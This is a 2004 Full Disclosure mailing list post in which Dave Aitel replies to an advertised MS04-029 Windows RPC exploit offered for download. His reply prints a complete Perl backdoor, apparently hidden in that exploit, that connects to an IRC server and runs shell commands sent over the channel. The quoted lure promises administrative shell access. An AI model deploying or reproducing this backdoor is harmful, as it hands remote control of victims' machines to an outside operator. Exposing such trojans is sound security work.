Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: New Remote Windows Exploit (MS04-029)
From: Dave Aitel <dave () immunitysec com>
Date: Wed, 03 Nov 2004 15:59:16 -0500

python /tmp/p.py
Cute.

#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#/tmp/hi

-dave

Max Load wrote:

/*
*  Date: 2004/10/30
*  Maxload load_max () yahoo com
*
*  Exploit for \"Vulnerability in RPC Runtime Library\"
*  http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
*  Tested Against:
*  Windows 2000 (SP3 SP4)
*  Windows XP (SP1 SP2)
*  Windows NT4 (SP6a)
*
*  EXPLOIT IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
*  I TAKE NO RESPONSIBILITY FOR ANY USE OF THIS CODE.
*
*
*  Instructions:
*
*  [user () localhost] $ gcc -o maxload maxload.c
*  [user () localhost] $ ./maxload
*  *** MaxLoad (windows rpc exploit) v.1 ***
*
*  For educational propose only!
*  error: you must enter a valid ip
*  usage:./maxload [IP-ADDRESS]
*  e.g: ./maxload 192.168.1.23
*
*
*  [user () localhost] $ ./maxload 192.168.1.2
*  *** MaxLoad (windows rpc exploit) v.1 ***
*  For educational propose only!
*  Succes! Try connect to 192.168.1.2 port 31337
*
*
*  [user () localhost] $ telnet 192.168.1.2 31337
*  Connected to 192.168.1.2.
*  Escape character is \'^]\'.
*
*  Microsoft Windows XP [Version 5.1.2600]
*  © Copyright 1985-2001 Microsoft Corp.
*
*  C:\\>
*
* Bang, here you go, administrative access..
*
*/

Do i need too say more :D

https://fri-adgang.dk/?get=1056]maxload.c (source code)
https://fri-adgang.dk/?get=1055]maxload (linux static binary)

-MaxLoad

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]